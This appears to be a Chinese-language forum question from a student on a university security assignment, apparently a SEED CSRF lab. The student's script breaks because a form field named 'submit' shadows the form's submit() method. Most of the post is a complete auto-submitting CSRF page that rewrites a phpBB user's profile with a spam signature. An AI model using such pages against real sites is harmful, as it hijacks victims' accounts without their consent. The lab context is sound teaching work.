以下代码创建一个必须以 &submit="Submit" 结尾的 POST 语句
不幸的是,这会与 DOM 表单对象产生冲突。
我无权访问 Web 应用程序,因为这是大学安全任务的一部分。我已经能够通过代理手动编辑数据并将元素添加到成功运行的 POST 正文中,但我希望能够通过自动代码完成这一切。
任何帮助将非常感激。
<html>
<body>
<h1>
This page sends a HTTP POST request onload. </h1>
<script>
function post(url,fields) {
//create a <form> element.
var p = document.createElement('form');
//construct the form
p.action = url;
p.innerHTML = fields;
p.target = '_self';
p.method = 'post';
//append the form to this page
document.body.appendChild(p);
//submit the form
p.submit();
}
function csrf_hack() {
var fields;
// You should replace/augment the following lines with
// your form parameters
fields += "<input type='hidden' name='username' value='bob'>";
fields += "<input type='hidden' name='email' value='bob@seed.com'>";
fields += "<input type='hidden' name='cur_password' value=''>";
fields += "<input type='hidden' name='new_password' value=''>";
fields += "<input type='hidden' name='password_confirm' value=''>";
fields += "<input type='hidden' name='icq' value=''>";
fields += "<input type='hidden' name='aim' value=''>";
fields += "<input type='hidden' name='msn' value='456'>";
fields += "<input type='hidden' name='yim' value=''>";
fields += "<input type='hidden' name='website' value=''>";
fields += "<input type='hidden' name='location' value=''>";
fields += "<input type='hidden' name='occupation' value=''>";
fields += "<input type='hidden' name='interests' value='Hacking'>";
fields += "<input type='hidden' name='signature' value='Free spicy sauce @ www.getyourfreespicysauce.com'>";
fields += "<input type='hidden' name='viewemail' value='0'>";
fields += "<input type='hidden' name='hideonline' value='0'>";
fields += "<input type='hidden' name='notifyreply' value='0'>";
fields += "<input type='hidden' name='notifypm' value='1'>";
fields += "<input type='hidden' name='popup_pm' value='1'>";
fields += "<input type='hidden' name='attachsig' value='1'>";
fields += "<input type='hidden' name='allowbbcode' value='1'>";
fields += "<input type='hidden' name='allowhtml' value='0'>";
fields += "<input type='hidden' name='allowsmilies' value='1'>";
fields += "<input type='hidden' name='language' value='english'>";
fields += "<input type='hidden' name='style' value='1'>";
fields += "<input type='hidden' name='timezone' value='0'>";
fields += "<input type='hidden' name='dateformat' value='D M d, Y g:ia'>";
fields += "<input type='hidden' name='mode' value='editprofile'>";
fields += "<input type='hidden' name='agreed' value='true'>";
fields += "<input type='hidden' name='coppa' value='0'>";
fields += "<input type='hidden' name='sid' value='341942b39d0e2af257286aabd65b1e31'>";
fields += "<input type='hidden' name='user_id' value='4'>";
fields += "<input type='hidden' name='current_email' value='bob@seed.com'>";
//this causes p.submit to not be invoked
fields += "<input type='hidden' name='submit' value='Submit'>";
post('http://www.originalphpbb.com/profile.php',fields);
}
window.onload = function() { csrf_hack(); }
</script>
</body></html>